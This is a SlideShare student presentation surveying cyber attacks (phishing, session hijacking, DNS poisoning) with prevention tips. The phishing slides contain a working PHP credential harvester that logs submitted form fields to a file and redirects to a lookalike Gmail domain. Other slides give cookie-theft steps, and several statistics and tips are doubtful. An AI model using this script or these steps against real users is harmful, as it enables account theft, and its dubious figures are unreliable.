SlideShare a Scribd company logo
ATTACKS ON THE
CYBER WORLD
BY:
NIKHIL TRIPATHI(12MCMB10)
TARUN MEHROTRA(12MCMB11)
SUDHIR KUMAR PANDEY(12MCMB14 )
FLOW OF CONTENTS
 INTRODUCTION
 TYPES OF ATTACKS
 SOCIAL ENGINEERING
 PHISHING
 SESSION HIJACKING
 DNS SPOOFING
 CONCLUSION
 REFERENCES
INTRODUCTION
“A threat where weapons are computers- the most destructive weapon
on the planet.” - Kevin Mitnick
• 528.1 % is the growth rate of internet users over 2000-2011.
• 85% of business and government agencies detected security breaches.
• FBI estimates that the United States loses up to $10 billion a year to
cyber crime.
• In INDIA, 30 million people fell victim to cyber crime last year resulting
in loss of Rs34,110 crore, annually.
• Being INTERNET addicted, only one question should arise in our
minds—
INTRODUCTION
“A threat where weapons are computers- the most destructive weapon
on the planet.” - Kevin Mitnick
• 528.1 % is the growth rate of internet users over 2000-2011.
• 85% of business and government agencies detected security breaches.
• FBI estimates that the United States loses up to $10 billion a year to
cyber crime.
• In INDIA, 30 million people fell victim to cyber crime last year resulting
in loss of Rs34,110 crore, annually.
• Being INTERNET addicted, only one question should arise in our
minds—
HOW MUCH WE ARE SECURE?????
VARIOUS ATTACKS
•More or less, hundreds of exploits are there which hackers practice on
the individual hosts or even on the whole network.
•Some of the most popular and dangerous attacks are:
> SESSION HIJACKING (SNIFFING).
> PHISHING.
> DOS ATTACK (SMURFING).
> DNS POISONING(DNS SPOOFING).
> SQL INJECTION.
> FAKE EMAILING AND EMAIL BOMBING.
> TROJAN HORSES, KEYLOGGERS and many more….
SOCIAL ENGINEERING
•Art of manipulating people into performing actions or divulging
confidential information.
•An art of DECEPTION.
•Varies from purely technical to purely non-technical.
•Depends upon the victim’s cyber knowledge.
•Depends upon till what extent attacker is spoofing its identity.
•Result of human’s unawareness about the cyber crimes.
•Initiation of almost all the cyber attacks practiced nowadays.
•One of the most dangerous and most effective technique.
•PHISHING is an example of technical social engineering.
PHISHING
•Act of attempting to acquire information such as usernames,
passwords, by masquerading as a trustworthy entity in an electronic
communication.
•Started in late 90’s.
•Named after the earlier hackers, known as phreakers…
•Still, the most effective and most dangerous social-engineering attack.
•Overall cost due to online fraud by phishing reached to 3 Billion $ in
2007.
•In 2011, it reached the peak of 94 Billion $.
•Main reason for growth in phishing scam is the users’ unawareness.
PHISHING(contd.)
HOW IT WORKS?
Components of Phishing are:-
•A fake page
•A PHP script to redirect user to the original page containing some
notifications
•The redirected original page along with some notification
•The generated text file having username and password
SCREENSHOTS FOR
PHISHING DEMO
Working(contd.)
•Change the redirected url to the url of PHP file and make sure that both the
fake page and PHP script is present within the same directory.
•Change the method from POST to GET.
•PHP code:-
<?php
header("Location: http://gmaiil.t35.com/ServiceLoginAuth.htm");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>
HOW TO PREVENT
PHISHING?
1. The most basic thing is to see the lock beside the url field of the browser.
2. Check the url.
3. Check the certificate allotted to the company by the authorized party. E.g.
Thawte Consulting in case of Google.
4. If possible, enter the IP address for the gmail.com instead of the domain
name. Its time taking but far secure for phishing and DNS poisoning to
happen.
But what if it is combined with other attacks?
SESSION HIJACKING
•Used to refer to the theft of a magic cookie responsible to authenticate a user
to a remote server.
•Some basic methods to implement the attack: Session fixation, Cross-site
scripting and the most popular one- Session sidejacking .
•Started in 2004 and gained popularity among the hackers like a wildfire.
•American National agencies faced million dollars losses due to this attack.
•Falls into the category of the deadliest attacks due to occurrences of huge
losses.
•Can be implemented by first capturing the packets and then analyzing it.
•Cain & Abel is popular for capturing and APR and Wireshark/Ettercap is
popular for analyzing the packets.
HOW IT WORKS?
1. Applicable only if using LANs for accessing the internet.
2. Victim access the internet by accessing the default gateway.
3. Attacker sitting in the same network captures the packet going from
victim’s machine to the default gateway and vice-versa.
4. Now, after capturing, attacker analyze the packets and read the cookies.
5. Next, attacker copies those cookies and set it into his/her browser.
6. That’s it. Now, he’ll get access to user’s account.
WORKING(contd.)
SCREENSHOTS FOR
SESSION HIGHJACKING
HOW TO PREVENT SESSION
HIJACKING?
1. If possible, never use any shared network to access your accounts.
2. Otherwise, log out after every few seconds, but it seems impossible.
3. The best way is that web servers should use time stamped cookies but it is
still in somewhat, testing phase.
4. Otherwise, use HTTPs to encrypt the traffic.
But what if attacker intentionally downgrades your HTTPs connection to
HTTP!!!
DNS POISONING
• An attack where victim’s machine gets fooled and redirected to some other
server rather than the desired server.
•Also called DNS spoofing.
•Attacker poisons the DNS cache entry so it starts giving false results.
•Cain & Abel can be used for this purpose by using MAN-IN-THE-MIDDLE
attack.
•Being an insecure protocol, any host can resolve the query generated by a
user.
HOW IT WORKS?
HOW TO PREVENT DNS
POISONING?
•The only way to prevent DNS poisoning is by making this protocol a secure
one. Research is still going on in this field under the brolly of Verisign Inc.
•The new protocol will be named as DNSSEC(Domain Name System Security
Extension).
•http://verisigninc.com is the only domain yet which we found as DNSSEC
enabled.
•DNSSEC-enabled packets are larger (> 512 bytes) than traditional DNS
packets.
•DNSSEC will generate more TCP traffic.
•DNSSEC requires support for EDNS0.
•Thus, a huge change will be required before DNSSEC implementation.
CONCLUSION
•Many attacks are being practiced on the internet all round the globe.
•Along with these attacks, some mechanisms are there to be secure from
these attacks.
•But these mechanisms are not enough to secure us from all the possibilities.
•The day is not away from us when the two important components of Internet
will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we
can say that internet is now secure.
•But what to do untill that day? How to be completely secure in this cyber
world??
•Till then, the only answer which one can think of is---
CONCLUSION
•Many attacks are being practiced on the internet all round the globe.
•Along with these attacks, some mechanisms are there to be secure from
these attacks.
•But these mechanisms are not enough to secure us from all the possibilities.
•The day is not away from us when the two important components of Internet
will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we
can say that internet is now secure.
•But what to do untill that day? How to be completely secure in this cyber
world??
•Till then, the only answer which one can think of is---
STAY AWAY FROM INTERNET!!!
Its not the proper answer, but at least, its true….
REFERENCES
•http://firewall.cx
•http://social-engineer.org
•http://hackforums.net
•http://defcon.org
•http://networkworld.com
•http://verisigninc.com
•http://stackoverflow.com
•http://sessionhijack.com
THANK YOU…

More Related Content

What's hot

Blackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareBlackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of Ransomware
John Bambenek
 
Ransomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion MenaceRansomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion Menace
Zubair Baig
 
WHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of RansomwareWHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of Ransomware
Symantec
 
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
ClearDATACloud
 
Ransomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & MitigationRansomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & Mitigation
WhiskeyNeon
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons Learned
Thomas Roccia
 
Hacking final
Hacking finalHacking final
Hacking final
JiyaaNaqvi
 
Ransomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, PreventionRansomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, Prevention
Mohammad Yahya
 
Computer Security Hacking
Computer Security HackingComputer Security Hacking
Computer Security Hacking
Erdo Deshiant Garnaby
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your Data
Inderjeet Singh
 
Ransomware
Ransomware Ransomware
Ransomware
Armor
 
Hacking and Types of Hacker.
Hacking and Types of Hacker.Hacking and Types of Hacker.
Hacking and Types of Hacker.
Coder Tech
 
Computer Security
Computer SecurityComputer Security
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
North Texas Chapter of the ISSA
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Roger Hagedorn
 
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
ClearDATACloud
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec
 
Information-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxInformation-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptx
anbersattar
 
WannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt RansomwareWannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt Ransomware
Ayoub Rouzi
 
Ransomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breachRansomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breach
Gowling WLG
 

What's hot (20)

Blackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareBlackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of Ransomware
 
Ransomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion MenaceRansomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion Menace
 
WHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of RansomwareWHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of Ransomware
 
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
 
Ransomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & MitigationRansomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & Mitigation
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons Learned
 
Hacking final
Hacking finalHacking final
Hacking final
 
Ransomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, PreventionRansomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, Prevention
 
Computer Security Hacking
Computer Security HackingComputer Security Hacking
Computer Security Hacking
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your Data
 
Ransomware
Ransomware Ransomware
Ransomware
 
Hacking and Types of Hacker.
Hacking and Types of Hacker.Hacking and Types of Hacker.
Hacking and Types of Hacker.
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
 
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
Information-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxInformation-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptx
 
WannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt RansomwareWannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt Ransomware
 
Ransomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breachRansomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breach
 

Viewers also liked

Securing Yourself in the Cyber World
Securing Yourself in the Cyber WorldSecuring Yourself in the Cyber World
Securing Yourself in the Cyber World
Emil Tan
 
Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.
Thomas Lee
 
Stalking in the Cyberspace
Stalking in the CyberspaceStalking in the Cyberspace
Stalking in the Cyberspace
Emil Tan
 
A Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on CybersecurityA Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on Cybersecurity
Emil Tan
 
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
Robert Cole
 
Ethical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is CyberworldEthical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is Cyberworld
Amae OlFato
 
5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep Web5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep Web
Amber Horsburgh
 
Cyber Security in the Interconnected World
Cyber Security in the Interconnected WorldCyber Security in the Interconnected World
Cyber Security in the Interconnected World
Russell_Kennedy
 
A Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data BreachA Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data Breach
Jim Brashear
 
Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected?  Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected?
Mark Merrill
 
Deep Web - what to do and what not to do
Deep Web - what to do and what not to do	Deep Web - what to do and what not to do
Deep Web - what to do and what not to do
Cysinfo Cyber Security Community
 
The Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet AnonymityThe Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet Anonymity
Abhimanyu Singh
 
cyber terrorism
cyber terrorismcyber terrorism
cyber terrorism
Accenture
 
Web 2.0
Web 2.0Web 2.0
Cyber Terrorism
Cyber TerrorismCyber Terrorism
Cyber Terrorism
loverakk187
 
Malaysia's National Cyber Security Policy
Malaysia's National Cyber Security PolicyMalaysia's National Cyber Security Policy
Malaysia's National Cyber Security Policy
Directorate of Information Security | Ditjen Aptika
 
The Emerging Global Web
The Emerging Global WebThe Emerging Global Web
The Emerging Global Web
yiibu
 
Deep Web
Deep WebDeep Web
Deep WebSt John
 
DNS - Domain Name System
DNS - Domain Name SystemDNS - Domain Name System
DNS - Domain Name System
Peter R. Egli
 

Viewers also liked (20)

Securing Yourself in the Cyber World
Securing Yourself in the Cyber WorldSecuring Yourself in the Cyber World
Securing Yourself in the Cyber World
 
Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.
 
Stalking in the Cyberspace
Stalking in the CyberspaceStalking in the Cyberspace
Stalking in the Cyberspace
 
A Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on CybersecurityA Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on Cybersecurity
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
 
Ethical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is CyberworldEthical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is Cyberworld
 
5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep Web5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep Web
 
Cyber Security in the Interconnected World
Cyber Security in the Interconnected WorldCyber Security in the Interconnected World
Cyber Security in the Interconnected World
 
A Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data BreachA Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data Breach
 
Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected?  Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected?
 
Deep Web - what to do and what not to do
Deep Web - what to do and what not to do	Deep Web - what to do and what not to do
Deep Web - what to do and what not to do
 
The Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet AnonymityThe Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet Anonymity
 
cyber terrorism
cyber terrorismcyber terrorism
cyber terrorism
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Cyber Terrorism
Cyber TerrorismCyber Terrorism
Cyber Terrorism
 
Malaysia's National Cyber Security Policy
Malaysia's National Cyber Security PolicyMalaysia's National Cyber Security Policy
Malaysia's National Cyber Security Policy
 
The Emerging Global Web
The Emerging Global WebThe Emerging Global Web
The Emerging Global Web
 
Deep Web
Deep WebDeep Web
Deep Web
 
DNS - Domain Name System
DNS - Domain Name SystemDNS - Domain Name System
DNS - Domain Name System
 

Similar to Attacks on the cyber world

You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
TechGenie
 
hacking
hackinghacking
hacking
ADAIKKAPPANS1
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
basic knowhow hacking
basic knowhow hackingbasic knowhow hacking
basic knowhow hacking
Anant Shrivastava
 
AtlSecCon 2016
AtlSecCon 2016AtlSecCon 2016
AtlSecCon 2016
Earl Carter
 
Denial of services : limiting the threat
Denial of services : limiting the threatDenial of services : limiting the threat
Denial of services : limiting the threat
SensePost
 
Recognizing security threats
Recognizing security threatsRecognizing security threats
Recognizing security threatsKishore Kumar
 
Meletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information securityMeletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information security
Meletis Belsis MPhil/MRes/BSc
 
DDoS mitigation in the real world
DDoS mitigation in the real worldDDoS mitigation in the real world
DDoS mitigation in the real world
Michael Renner
 
Cyber Crime And Security
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security
ritik shukla
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Nipun Jaswal
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manual
Roel Palmaers
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
afaque jaya
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
frcarlson
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
GDSCCVR
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
Robert Herjavec
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 2017
Bret Piatt
 
Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.
JasminJaman1
 

Similar to Attacks on the cyber world (20)

You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
 
Network Security
Network SecurityNetwork Security
Network Security
 
hacking
hackinghacking
hacking
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
basic knowhow hacking
basic knowhow hackingbasic knowhow hacking
basic knowhow hacking
 
AtlSecCon 2016
AtlSecCon 2016AtlSecCon 2016
AtlSecCon 2016
 
Denial of services : limiting the threat
Denial of services : limiting the threatDenial of services : limiting the threat
Denial of services : limiting the threat
 
Recognizing security threats
Recognizing security threatsRecognizing security threats
Recognizing security threats
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Meletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information securityMeletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information security
 
DDoS mitigation in the real world
DDoS mitigation in the real worldDDoS mitigation in the real world
DDoS mitigation in the real world
 
Cyber Crime And Security
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manual
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 2017
 
Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.
 

Recently uploaded

The basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptxThe basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptx
heathfieldcps1
 
Language Across the Curriculm LAC B.Ed.
Language Across the  Curriculm LAC B.Ed.Language Across the  Curriculm LAC B.Ed.
Language Across the Curriculm LAC B.Ed.
Atul Kumar Singh
 
How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...
Jisc
 
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXXPhrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
MIRIAMSALINAS13
 
Operation Blue Star - Saka Neela Tara
Operation Blue Star   -  Saka Neela TaraOperation Blue Star   -  Saka Neela Tara
Operation Blue Star - Saka Neela Tara
Balvir Singh
 
Palestine last event orientationfvgnh .pptx
Palestine last event orientationfvgnh .pptxPalestine last event orientationfvgnh .pptx
Palestine last event orientationfvgnh .pptx
RaedMohamed3
 
Instructions for Submissions thorugh G- Classroom.pptx
Instructions for Submissions thorugh G- Classroom.pptxInstructions for Submissions thorugh G- Classroom.pptx
Instructions for Submissions thorugh G- Classroom.pptx
Jheel Barad
 
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCECLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
BhavyaRajput3
 
Chapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptxChapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptx
Mohd Adib Abd Muin, Senior Lecturer at Universiti Utara Malaysia
 
The Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official PublicationThe Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official Publication
Delapenabediema
 
"Protectable subject matters, Protection in biotechnology, Protection of othe...
"Protectable subject matters, Protection in biotechnology, Protection of othe..."Protectable subject matters, Protection in biotechnology, Protection of othe...
"Protectable subject matters, Protection in biotechnology, Protection of othe...
SACHIN R KONDAGURI
 
Thesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.pptThesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.ppt
EverAndrsGuerraGuerr
 
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
Nguyen Thanh Tu Collection
 
The French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free downloadThe French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free download
Vivekanand Anglo Vedic Academy
 
Acetabularia Information For Class 9 .docx
Acetabularia Information For Class 9  .docxAcetabularia Information For Class 9  .docx
Acetabularia Information For Class 9 .docx
vaibhavrinwa19
 
Synthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptxSynthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptx
Pavel ( NSTU)
 
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup   New Member Orientation and Q&A (May 2024).pdfWelcome to TechSoup   New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
TechSoup
 
A Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in EducationA Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in Education
Peter Windle
 
Guidance_and_Counselling.pdf B.Ed. 4th Semester
Guidance_and_Counselling.pdf B.Ed. 4th SemesterGuidance_and_Counselling.pdf B.Ed. 4th Semester
Guidance_and_Counselling.pdf B.Ed. 4th Semester
Atul Kumar Singh
 
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
MysoreMuleSoftMeetup
 

Recently uploaded (20)

The basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptxThe basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptx
 
Language Across the Curriculm LAC B.Ed.
Language Across the  Curriculm LAC B.Ed.Language Across the  Curriculm LAC B.Ed.
Language Across the Curriculm LAC B.Ed.
 
How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...
 
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXXPhrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
 
